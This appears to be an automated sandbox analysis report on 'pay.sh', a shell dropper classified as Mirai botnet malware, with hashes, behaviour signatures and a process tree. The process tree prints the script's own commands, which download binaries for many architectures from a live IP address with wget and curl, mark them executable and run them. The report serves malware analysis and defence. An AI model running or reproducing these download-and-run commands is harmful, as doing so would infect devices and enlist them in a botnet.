Overview

overview

10

Static

static

1

pay.sh

ubuntu-18.04-amd64

10

pay.sh

debian-9-armhf

10

pay.sh

debian-9-mips

10

pay.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    149s
  • max time network
    160s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    13-12-2024 12:33

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    pay.sh

  • Size

    2KB

  • MD5

    624b68623e669355734d1149ffd5d430

  • SHA1

    ce07fb83638c8fa2865aa2b3d007c35902f7d96a

  • SHA256

    2942033aaf811f6413e49820d60ca6d0d3400297b30068f540155d91f0f071cc

  • SHA512

    143e96f06f585f9b6702e9e33497936b5c7b2675a8e0f9aaa3b93289926491ad7e6e204b114a7ca5c09d4bbd44cf2b2b005801ca31338b10d8cbbe9301c4bb23

Score
10/10
miraiunstantivmbotnetdefense_evasiondiscoveryupx

Malware Config

Extracted

Family

mirai

Botnet

UNST

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Mirai family
    mirai
  • Contacts a large (29435) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 10 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 10 IoCs
  • Modifies Watchdog functionality 1 TTPs 12 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Enumerates active TCP sockets 1 TTPs 6 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

    discovery
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Checks CPU configuration 1 TTPs 10 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

    antivm
  • Reads system network configuration 1 TTPs 6 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

    discovery
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 20 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/pay.sh
    /tmp/pay.sh
    1⤵
    • Writes file to tmp directory
    PID:639
    • /usr/bin/wget
      wget http://15.228.54.104/beastmode/b3astmode.x86
      2⤵
      • Writes file to tmp directory
      PID:641
    • /usr/bin/curl
      curl -O http://15.228.54.104/beastmode/b3astmode.x86
      2⤵
      • Checks CPU configuration
      • Reads runtime system information
      • Writes file to tmp directory
      PID:666
    • /bin/cat
      cat b3astmode.x86
      2⤵
        PID:670
      • /bin/chmod
        chmod +x B3ASTM0DE b3astmode.x86 pay.sh systemd-private-08791cf48a0946839dad8e4df8e58be6-systemd-timedated.service-tInZxI
        2⤵
        • File and Directory Permissions Modification
        PID:671
      • /tmp/B3ASTM0DE
        ./B3ASTM0DE
        2⤵
        • Executes dropped EXE
        PID:672
      • /usr/bin/wget
        wget http://15.228.54.104/beastmode/b3astmode.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:674
      • /usr/bin/curl
        curl -O http://15.228.54.104/beastmode/b3astmode.mips
        2⤵
        • Checks CPU configuration
        • Reads runtime system information
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:686
      • /bin/cat
        cat b3astmode.mips
        2⤵
        • System Network Configuration Discovery
        PID:699
      • /bin/chmod
        chmod +x B3ASTM0DE b3astmode.mips b3astmode.x86 pay.sh systemd-private-08791cf48a0946839dad8e4df8e58be6-systemd-timedated.service-tInZxI
        2⤵
        • File and Directory Permissions Modification
        PID:701
      • /tmp/B3ASTM0DE
        ./B3ASTM0DE
        2⤵
        • Executes dropped EXE
        PID:702
      • /usr/bin/wget
        wget http://15.228.54.104/beastmode/b3astmode.mpsl
        2⤵
        • Writes file to tmp directory
        PID:704
      • /usr/bin/curl
        curl -O http://15.228.54.104/beastmode/b3astmode.mpsl
        2⤵
        • Checks CPU configuration
        • Writes file to tmp directory
        PID:720
      • /bin/cat
        cat b3astmode.mpsl
        2⤵
          PID:727
        • /bin/chmod
          chmod +x B3ASTM0DE b3astmode.mips b3astmode.mpsl b3astmode.x86 pay.sh systemd-private-08791cf48a0946839dad8e4df8e58be6-systemd-timedated.service-tInZxI
          2⤵
          • File and Directory Permissions Modification
          PID:728
        • /tmp/B3ASTM0DE
          ./B3ASTM0DE
          2⤵
          • Executes dropped EXE
          PID:729
        • /usr/bin/wget
          wget http://15.228.54.104/beastmode/b3astmode.arm4
          2⤵
            PID:731
          • /usr/bin/curl
            curl -O http://15.228.54.104/beastmode/b3astmode.arm4
            2⤵
            • Checks CPU configuration
            • Reads runtime system information
            • Writes file to tmp directory
            PID:736
          • /bin/cat
            cat b3astmode.arm4
            2⤵
              PID:746
            • /bin/chmod
              chmod +x B3ASTM0DE b3astmode.arm4 b3astmode.mips b3astmode.mpsl b3astmode.x86 pay.sh systemd-private-08791cf48a0946839dad8e4df8e58be6-systemd-timedated.service-tInZxI
              2⤵
              • File and Directory Permissions Modification
              PID:748
            • /tmp/B3ASTM0DE
              ./B3ASTM0DE
              2⤵
              • Executes dropped EXE
              PID:749
            • /usr/bin/wget
              wget http://15.228.54.104/beastmode/b3astmode.arm5
              2⤵
              • Writes file to tmp directory
              PID:750
            • /usr/bin/curl
              curl -O http://15.228.54.104/beastmode/b3astmode.arm5
              2⤵
              • Checks CPU configuration
              • Reads runtime system information
              • Writes file to tmp directory
              PID:767
            • /bin/cat
              cat b3astmode.arm5
              2⤵
                PID:768
              • /bin/chmod
                chmod +x B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.mips b3astmode.mpsl b3astmode.x86 pay.sh systemd-private-08791cf48a0946839dad8e4df8e58be6-systemd-timedated.service-tInZxI
                2⤵
                • File and Directory Permissions Modification
                PID:769
              • /tmp/B3ASTM0DE
                ./B3ASTM0DE
                2⤵
                • Executes dropped EXE
                • Modifies Watchdog functionality
                • Enumerates active TCP sockets
                • Reads system network configuration
                • Reads runtime system information
                PID:770
              • /usr/bin/wget
                wget http://15.228.54.104/beastmode/b3astmode.arm6
                2⤵
                • Writes file to tmp directory
                PID:774
              • /usr/bin/curl
                curl -O http://15.228.54.104/beastmode/b3astmode.arm6
                2⤵
                • Checks CPU configuration
                • Reads runtime system information
                • Writes file to tmp directory
                PID:780
              • /bin/chmod
                chmod +x B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.arm6 b3astmode.mips b3astmode.mpsl b3astmode.x86 pay.sh systemd-private-08791cf48a0946839dad8e4df8e58be6-systemd-timedated.service-tInZxI
                2⤵
                • File and Directory Permissions Modification
                PID:782
              • /tmp/B3ASTM0DE
                ./B3ASTM0DE
                2⤵
                • Executes dropped EXE
                • Modifies Watchdog functionality
                • Enumerates active TCP sockets
                • Reads system network configuration
                • Reads runtime system information
                PID:783
              • /usr/bin/wget
                wget http://15.228.54.104/beastmode/b3astmode.arm7
                2⤵
                • Writes file to tmp directory
                PID:805
              • /usr/bin/curl
                curl -O http://15.228.54.104/beastmode/b3astmode.arm7
                2⤵
                • Checks CPU configuration
                • Reads runtime system information
                • Writes file to tmp directory
                PID:808
              • /bin/chmod
                chmod +x B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.arm6 b3astmode.arm7 b3astmode.mips b3astmode.mpsl b3astmode.x86 pay.sh
                2⤵
                • File and Directory Permissions Modification
                PID:813
              • /tmp/B3ASTM0DE
                ./B3ASTM0DE
                2⤵
                • Executes dropped EXE
                • Modifies Watchdog functionality
                • Enumerates active TCP sockets
                • Reads system network configuration
                • Reads runtime system information
                PID:814
              • /usr/bin/wget
                wget http://15.228.54.104/beastmode/b3astmode.ppc
                2⤵
                • Writes file to tmp directory
                PID:820
              • /usr/bin/curl
                curl -O http://15.228.54.104/beastmode/b3astmode.ppc
                2⤵
                • Checks CPU configuration
                • Writes file to tmp directory
                PID:823
              • /bin/chmod
                chmod +x B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.arm6 b3astmode.arm7 b3astmode.mips b3astmode.mpsl b3astmode.ppc b3astmode.x86 pay.sh
                2⤵
                • File and Directory Permissions Modification
                PID:825
              • /tmp/B3ASTM0DE
                ./B3ASTM0DE
                2⤵
                • Executes dropped EXE
                • Modifies Watchdog functionality
                • Enumerates active TCP sockets
                • Reads system network configuration
                • Reads runtime system information
                PID:826
              • /usr/bin/wget
                wget http://15.228.54.104/beastmode/b3astmode.m68k
                2⤵
                • Writes file to tmp directory
                PID:832
              • /usr/bin/curl
                curl -O http://15.228.54.104/beastmode/b3astmode.m68k
                2⤵
                • Checks CPU configuration
                • Reads runtime system information
                • Writes file to tmp directory
                PID:833
              • /bin/chmod
                chmod +x B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.arm6 b3astmode.arm7 b3astmode.m68k b3astmode.mips b3astmode.mpsl b3astmode.ppc b3astmode.x86 pay.sh
                2⤵
                • File and Directory Permissions Modification
                PID:835
              • /tmp/B3ASTM0DE
                ./B3ASTM0DE
                2⤵
                • Executes dropped EXE
                • Modifies Watchdog functionality
                • Enumerates active TCP sockets
                • Reads system network configuration
                • Reads runtime system information
                PID:836
              • /usr/bin/wget
                wget http://15.228.54.104/beastmode/b3astmode.sh4
                2⤵
                • Writes file to tmp directory
                PID:850
              • /usr/bin/curl
                curl -O http://15.228.54.104/beastmode/b3astmode.sh4
                2⤵
                • Checks CPU configuration
                • Writes file to tmp directory
                PID:851
              • /bin/chmod
                chmod +x B3ASTM0DE b3astmode.arm4 b3astmode.arm5 b3astmode.arm6 b3astmode.arm7 b3astmode.m68k b3astmode.mips b3astmode.mpsl b3astmode.ppc b3astmode.sh4 b3astmode.x86 pay.sh
                2⤵
                • File and Directory Permissions Modification
                PID:853
              • /tmp/B3ASTM0DE
                ./B3ASTM0DE
                2⤵
                • Executes dropped EXE
                • Modifies Watchdog functionality
                • Enumerates active TCP sockets
                • Reads system network configuration
                • Reads runtime system information
                PID:854

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • /tmp/B3ASTM0DE
              Filesize

              23KB

              MD5

              6fdcdf8e1a1d76e45fa874a20a18b804

              SHA1

              8f8253e997ac2997a16e3a189f441d30d9a7675c

              SHA256

              f7596984321fc1661a09c06d7da23513d21ab87ce7d3b2fed655ee1815288057

              SHA512

              d9e44d922034cde7f8504d603326c58d3e3a37e3362384e8c528430421839ffcac379711172da673e734d01e7c26e81ef97b6ebb0d1245f690639622c89834bc

              Download Submit

            • /tmp/B3ASTM0DE
              Filesize

              24KB

              MD5

              8e2bc890571386d49be504c19d6ae5f4

              SHA1

              ec10343c39481e9867cab49607feb8351baa17dd

              SHA256

              e5baf9cce449b61fe75c5bc6ceb2c0f82d4849d0827148bd33a6a1fb8f4b98a2

              SHA512

              75b232d0f4c28b33ec01f0c27bd4e73ddb17d007b6531a63266e08f32c6a8fbe1811aa7570c874c298a117edf31c2f2e191b35d628c65eed45ad723c718db4af

              Download Submit

            • /tmp/B3ASTM0DE
              Filesize

              275B

              MD5

              8a052866f3090135b18f374ce1049566

              SHA1

              cc858d4367e62558a09416f9521c159ec02ce42f

              SHA256

              efb22cd5a845c646f8c7516e4d0936eca928b961da2d866a75aa4b2626fb6120

              SHA512

              0b8541f9fa9dce7430684e0c788f798667bba45373c66436226a04e32494a3b62520b8289ce49001009e429153aa2c27c8e4cd794c59f6eef65ab0aa818a9d16

              Download Submit

            • /tmp/B3ASTM0DE
              Filesize

              49KB

              MD5

              d585800f95f4f716d9faf633ebaa9433

              SHA1

              ddf0a2bf2db94565ff0195178c35464c461bba26

              SHA256

              ff3b43f66762a8b39fe29e4a99079f6086a9963015140775aa3ac5fe427ec558

              SHA512

              af4c64a694d237e9994abaae75a5444050bbf87726b0d0025bdbcc94ce307b785ff93d79504069b390e51583db7fbc1735d164254bc3822b33154b96f6b94122

              Download Submit

            • /tmp/b3astmode.x86
              Filesize

              22KB

              MD5

              873c6ba01596fdbb9c469fe1e0180243

              SHA1

              9236be2f17ba4d7422bf8f579d95c6226d3eaa48

              SHA256

              9959896b86d7dcb455c0f9d61ba74b19a3dc638ad08b51c4038ea5f092846170

              SHA512

              f218dc4f64b089abae03e2c996d016e71021cb353d35c034db147b4b083453085ee74273d119dc6e7440b5ccad2e00acaada435a10910a6af4a92f071a0ed1ee

              Download Submit